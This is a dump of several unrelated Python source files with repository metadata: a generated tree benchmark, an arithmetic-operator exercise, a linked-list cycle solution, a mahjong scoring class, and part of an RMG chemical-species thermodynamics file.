makeNode4(x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree4", x:int, x2:int) -> object: if self.root is None: self.root = makeNode4(x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object: if self.root is None: self.root = makeNode4(x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object: if self.root is None: self.root = makeNode4(x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree4", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree4", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool: if self.root is None: return False else: return self.root.contains(x) class Tree5(object): root:TreeNode5 = None root2:TreeNode5 = None root3:TreeNode5 = None root4:TreeNode5 = None root5:TreeNode5 = None size:int = 0 size2:int = 0 size3:int = 0 size4:int = 0 size5:int = 0 def insert(self:"Tree5", x:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree5", x:int, x2:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree5", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree5", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def makeNode(x: int) -> TreeNode: b:TreeNode = None b = TreeNode() b.value = x return b def makeNode2(x: int, x2: int) -> TreeNode2: b:TreeNode2 = None b2:TreeNode2 = None b = TreeNode2() b.value = x return b def makeNode3(x: int, x2: int, x3: int) -> TreeNode3: b:TreeNode3 = None b2:TreeNode3 = None b3:TreeNode3 = None b = TreeNode3() b.value = x return b def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4: b:TreeNode4 = None b2:TreeNode4 = None b3:TreeNode4 = None b4:TreeNode4 = None b = TreeNode4() b.value = x return b def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5: b:TreeNode5 = None b2:TreeNode5 = None b3:TreeNode5 = None b4:TreeNode5 = None b5:TreeNode5 = None b = TreeNode5() b.value = x return b # Input parameters n:int = 100 n2:int = 100 n3:int = 100 n4:int = 100 n5:int = 100 c:int = 4 c2:int = 4 c3:int = 4 c4:int = 4 c5:int = 4 # Data t:Tree = None t2:Tree = None t3:Tree = None t4:Tree = None t5:Tree = None i:int = 0 i2:int = 0 i3:int = 0 i4:int = 0 i5:int = 0 k:int = 37813 k2:int = 37813 k3:int = 37813 k4:int = 37813 k5:int = 37813 # Crunch t = Tree() while i < n: t.insert(k) k = (k * 37813) % 37831 if i % c != 0: t.insert(i) i = i + 1 print(t.size) for i in [4, 8, 15, 16, 23, 42]: if t.contains(i): print(i)
734222744177ba9b4b567229c0c42a7e3e563b04
71b11008ab0455dd9fd2c47107f8a27e08febb27
/04、 python编程/day01/3-code/算数运算符.py
449a9baa4ca2b1ae2202b8fdd1968229b4f48c70
[]
no_license
zmh19941223/heimatest2021
49ce328f8ce763df0dd67ed1d26eb553fd9e7da4
3d2e9e3551a199bda9945df2b957a9bc70d78f64
refs/heads/main
2023-08-25T17:03:31.519976
2021-10-18T05:07:03
2021-10-18T05:07:03
418,348,201
0
0
null
null
null
null
UTF-8
Python
false
false
112
py
print(3 + 2) print(3 - 2) print(3 * 2) print(3 / 2) print(3 // 2) print(3 % 2) print(3 ** 2) print("hello" * 3)
c6adb1d9469a5adfe8a767e63e40fbd9ab028c03
8df1237388352d29c894403feaf91e800edef6bf
/Algorithms/141.linked-list-cycle/141.linked-list-cycle.py
255c09e7e984294aef20caa856189c3b49b66f31
[ "MIT" ]
permissive
GaLaPyPy/leetcode-solutions
8cfa5d220516683c6e18ff35c74d84779975d725
40920d11c584504e805d103cdc6ef3f3774172b3
refs/heads/master
2023-06-19T22:28:58.956306
2021-07-19T00:20:56
2021-07-19T00:20:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
272
py
class Solution: def hasCycle(self, head: ListNode) -> bool: fast = slow = head while slow and fast and fast.next: slow = slow.next fast = fast.next if slow is fast: return True return False
5b47d39363b966b6fd8208f0f5a184dedf934ca4
c9642233f1de71f1a61ae28c695c2d9228825156
/echecs_espoir/service/mahjong/models/hutype/two/siguiyi.py
63d95ac314dad7a3b187dc3c09ab0befe8eacee5
[ "AFL-3.0" ]
permissive
obespoir/echecs
d8314cffa85c8dce316d40e3e713615e9b237648
e4bb8be1d360b6c568725aee4dfe4c037a855a49
refs/heads/master
2022-12-11T04:04:40.021535
2020-03-29T06:58:25
2020-03-29T06:58:25
249,185,889
16
9
null
null
null
null
UTF-8
Python
false
false
2,763
py
# coding=utf-8 import time from service.mahjong.models.hutype.basetype import BaseType from service.mahjong.constants.carddefine import CardType, CARD_SIZE from service.mahjong.models.card.hand_card import HandCard from service.mahjong.models.card.card import Card from service.mahjong.models.utils.cardanalyse import CardAnalyse class SiGuiYi(BaseType): """ 4) 四归一:胡牌时,牌里有4张相同的牌归于一家的顺、刻子、对、将牌中(不包括杠牌) 。 """ def __init__(self): super(SiGuiYi, self).__init__() def is_this_type(self, hand_card, card_analyse): used_card_type = [CardType.WAN] # 此游戏中使用的花色 union_card = hand_card.union_card_info gang_lst = [] gang_lst.extend(hand_card.dian_gang_card_vals) gang_lst.extend(hand_card.bu_gang_card_vals) gang_lst.extend(hand_card.an_gang_card_vals) ret = [] # 手里有4张的牌集 for i, count in enumerate(union_card[CardType.WAN]): if i == 0 and count < 4: return False if count == 4 and Card.cal_card_val(CardType.WAN, i) not in gang_lst: ret.append(Card.cal_card_val(CardType.WAN, i)) if not ret: return False gang_lst = self.get_gang_lst(hand_card) for i in ret: if i in gang_lst: return False return True def get_gang_lst(self, hand_card): ret = [] for i in hand_card.dian_gang_card_vals: # 点杠的牌 ret.append(i[0]) for i in hand_card.bu_gang_card_vals: # 补杠的牌 ret.append(i[0]) for i in hand_card.an_gang_card_vals: # 暗杠的牌 ret.append(i[0]) return ret if __name__ == "__main__": pass card_analyse = CardAnalyse() hand_card = HandCard(0) # hand_card.hand_card_info = { # 1: [9, 1, 1, 1, 1, 1, 1, 1, 1, 1], # 万 # 2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 条 # 3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 饼 # 4: [2, 2, 0, 0, 0], # 风 # 5: [3, 3, 0, 0], # 箭 # } hand_card.hand_card_info = { 1: [9, 1, 1, 4, 1, 1, 1, 1, 1, 1], # 万 2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 条 3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 饼 4: [2, 2, 0, 0, 0], # 风 5: [0, 0, 0, 0], # 箭 } hand_card.handle_hand_card_for_settle_show() hand_card.union_hand_card() print("hand_card =", hand_card.hand_card_vals) test_type = SiGuiYi() start_time = time.time() print(test_type.is_this_type(hand_card, card_analyse)) print("time = ", time.time() - start_time)
21c351a8fe2fc37d56c8ee1bc4ffb02f12c1c5cf
04803c70bb97012b7d500a177ac0240fb2ddbe38
/4chpd/pdep/network556_1.py
2b8da0c07c0a5631e9d783dabeb7fa796d2e24f7
[]
no_license
shenghuiqin/chpd
735e0415f6688d88579fc935459c1b0f53596d1d
396ba54629036e3f2be0b3fabe09b78c90d56939
refs/heads/master
2023-03-01T23:29:02.118150
2019-10-05T04:02:23
2019-10-05T04:02:23
192,084,217
0
0
null
2019-06-18T18:33:13
2019-06-15T13:52:28
HTML
UTF-8
Python
false
false
93,703
py
species( label = 'C=C[CH]C(C)O[CH]C(2302)', structure = SMILES('C=C[CH]C(C)O[CH]C'), E0 = (69.8904,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3000,3050,390,425,1340,1360,335,370,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.672656,0.0957605,-8.24922e-05,3.6976e-08,-6.69666e-12,8579.82,31.2676], Tmin=(100,'K'), Tmax=(1315.44,'K')), NASAPolynomial(coeffs=[18.8206,0.0364849,-1.48996e-05,2.71977e-09,-1.86197e-13,3451.42,-68.1203], Tmin=(1315.44,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(69.8904,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CCsJOCs)"""), ) species( label = 'C=CC=CC(381)', structure = SMILES('C=CC=CC'), E0 = (57.8956,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,2995,3010,3025,975,987.5,1000,1300,1337.5,1375,400,450,500,1630,1655,1680,180],'cm^-1')), HinderedRotor(inertia=(0.831076,'amu*angstrom^2'), symmetry=1, barrier=(19.1081,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.833175,'amu*angstrom^2'), symmetry=1, barrier=(19.1563,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (68.117,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(3140.68,'J/mol'), sigma=(5.4037,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=490.57 K, Pc=45.16 bar (from Joback method)"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.00727,0.0328459,1.55855e-05,-4.25745e-08,1.84259e-11,7044.82,16.9534], Tmin=(100,'K'), Tmax=(972.32,'K')), NASAPolynomial(coeffs=[11.2869,0.0212416,-7.50361e-06,1.3618e-09,-9.72233e-14,3984.25,-34.0139], Tmin=(972.32,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(57.8956,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(299.321,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH)"""), ) species( label = 'CH3CHO(52)', structure = SMILES('CC=O'), E0 = (-178.765,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,180,1305.64,1305.66,1305.67,3976.84],'cm^-1')), HinderedRotor(inertia=(0.136163,'amu*angstrom^2'), symmetry=1, barrier=(3.13064,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (44.0526,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(3625.12,'J/mol'), sigma=(3.97,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.72946,-0.00319329,4.75349e-05,-5.74586e-08,2.19311e-11,-21572.9,4.10302], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[5.40411,0.0117231,-4.22631e-06,6.83725e-10,-4.09849e-14,-22593.1,-3.48079], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-178.765,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""CH3CHO""", comment="""Thermo library: FFCM1(-)"""), ) species( label = '[CH2]C1[CH]C(C)OC1C(3810)', structure = SMILES('[CH2]C1[CH]C(C)OC1C'), E0 = (100.754,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.05457,0.0429246,6.83606e-05,-1.25698e-07,5.48853e-11,12244.5,26.7473], Tmin=(100,'K'), Tmax=(900.209,'K')), NASAPolynomial(coeffs=[17.0446,0.0297095,-5.98931e-06,7.31272e-10,-4.5941e-14,7022.18,-61.7305], Tmin=(900.209,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(100.754,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(469.768,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Tetrahydrofuran) + radical(CCJCO) + radical(Isobutyl)"""), ) species( label = 'H(19)', structure = SMILES('[H]'), E0 = (211.792,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (1.00794,'amu'), collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""), ) species( label = 'C=CC=C(C)O[CH]C(3811)', structure = SMILES('C=CC=C(C)O[CH]C'), E0 = (18.4008,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3025,407.5,1350,352.5,350,440,435,1725,2995,3025,975,1000,1300,1375,400,500,1630,1680,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (111.162,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.760161,0.0904933,-6.20578e-05,4.69667e-09,7.81107e-12,2397.25,29.882], Tmin=(100,'K'), Tmax=(969.439,'K')), NASAPolynomial(coeffs=[23.2212,0.0234865,-7.80361e-06,1.37545e-09,-9.74342e-14,-3753.46,-92.8118], Tmin=(969.439,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(18.4008,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + radical(CCsJOC(O))"""), ) species( label = 'C=C[CH]C(C)OC=C(3812)', structure = SMILES('C=C[CH]C(C)OC=C'), E0 = (-24.7917,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,2950,3000,3050,3100,1330,1430,900,1050,1000,1050,1600,1700,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (111.162,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.534319,0.0787576,-1.59677e-05,-4.7868e-08,2.72276e-11,-2799.48,29.02], Tmin=(100,'K'), Tmax=(957.022,'K')), NASAPolynomial(coeffs=[25.1838,0.0220849,-6.79384e-06,1.22813e-09,-9.22084e-14,-10049.3,-106.084], Tmin=(957.022,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-24.7917,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(C=CCJCO)"""), ) species( label = 'C=C=CC(C)O[CH]C(3813)', structure = SMILES('C=C=CC(C)O[CH]C'), E0 = (114.904,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([540,610,2055,3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (111.162,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.310802,0.088366,-7.57669e-05,3.37793e-08,-6.08475e-12,13980.2,32.2937], Tmin=(100,'K'), Tmax=(1321.76,'K')), NASAPolynomial(coeffs=[17.7324,0.033762,-1.37991e-05,2.52388e-09,-1.73009e-13,9210.52,-59.7877], Tmin=(1321.76,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(114.904,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(CCsJOCs)"""), ) species( label = '[CH2]C=C[CH]C(377)', structure = SMILES('[CH2]C=C[CH]C'), E0 = (240.064,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,2995,3025,975,1000,1300,1375,400,500,1630,1680,3025,407.5,1350,352.5,180],'cm^-1')), HinderedRotor(inertia=(0.0180055,'amu*angstrom^2'), symmetry=1, barrier=(19.7234,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(1.34503,'amu*angstrom^2'), symmetry=1, barrier=(119.627,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.0180001,'amu*angstrom^2'), symmetry=1, barrier=(19.7225,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (68.117,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.18178,0.0283568,2.70949e-05,-5.14684e-08,2.05693e-11,28948.9,17.5848], Tmin=(100,'K'), Tmax=(990.212,'K')), NASAPolynomial(coeffs=[10.2369,0.0240425,-9.12514e-06,1.70243e-09,-1.22294e-13,25969.9,-28.1844], Tmin=(990.212,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(240.064,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(Allyl_S)"""), ) species( label = 'CH3(34)', structure = SMILES('[CH3]'), E0 = (136.188,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (15.0345,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: FFCM1(-)"""), ) species( label = 'C=CC=CO[CH]C(3814)', structure = SMILES('C=CC=CO[CH]C'), E0 = (60.1923,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,2950,3100,1380,975,1025,1650,2995,3010,3025,975,987.5,1000,1300,1337.5,1375,400,450,500,1630,1655,1680,180,180,180,180],'cm^-1')), HinderedRotor(inertia=(0.965138,'amu*angstrom^2'), symmetry=1, barrier=(22.1904,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.963416,'amu*angstrom^2'), symmetry=1, barrier=(22.1508,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.965386,'amu*angstrom^2'), symmetry=1, barrier=(22.1961,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.963081,'amu*angstrom^2'), symmetry=1, barrier=(22.1431,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (97.1351,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.112572,0.0714945,-2.17543e-05,-4.20115e-08,2.68296e-11,7405.09,25.5545], Tmin=(100,'K'), Tmax=(925.225,'K')), NASAPolynomial(coeffs=[25.6278,0.00928354,-4.52553e-07,-3.63748e-11,-1.3952e-15,541.59,-107.978], Tmin=(925.225,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(60.1923,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(365.837,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsOsH) + group(Cds-CdsHH) + radical(CCsJOC(O))"""), ) species( label = 'C=CC[C](C)O[CH]C(3815)', structure = SMILES('C=CC[C](C)O[CH]C'), E0 = (133.678,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,360,370,350,2750,2850,1437.5,1250,1305,750,350,3010,987.5,1337.5,450,1655,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.19918,0.0981604,-0.000109576,7.3549e-08,-2.08823e-11,16223.7,32.3302], Tmin=(100,'K'), Tmax=(842.758,'K')), 